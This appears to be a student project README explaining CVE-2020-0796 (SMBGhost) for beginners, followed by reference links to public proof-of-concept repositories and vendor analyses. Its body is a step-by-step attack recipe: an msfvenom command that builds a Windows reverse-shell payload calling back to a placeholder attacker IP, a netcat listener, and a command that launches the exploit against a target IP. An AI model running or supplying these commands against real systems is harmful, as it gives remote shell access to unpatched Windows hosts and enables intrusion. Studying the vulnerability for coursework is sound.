CVE-2020-0796 explanation and vulnerability research for the CENG325 term project, for beginners
User payload generation for reverse shell:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
Listening port:
nc -lvnp 5555
Exploit code execution:
python3 exploit.py -ip TARGET_IP
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost
- CVE-2020-0796: “Wormable” Remote Code Execution Vulnerability in. (2020, March 13). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
- “I’ll ask your body”: SMBGhost pre-auth RCE abusing Direct Memory Access structs. (2020, April 20). Ricercasecurity.Blogspot. https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
- CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server | FortiGuard Labs. (2020, March 12). Fortinet Blog. https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
- Team, K. (2020, April 2). CVE-2020–0796 Windows SMBv3 LPE Exploit POC Analysis. Medium. https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
- CVE-2020-0796 –. (2020). Cyber Threat Insider Blog. https://blog.sensecy.com/tag/cve-2020-0796/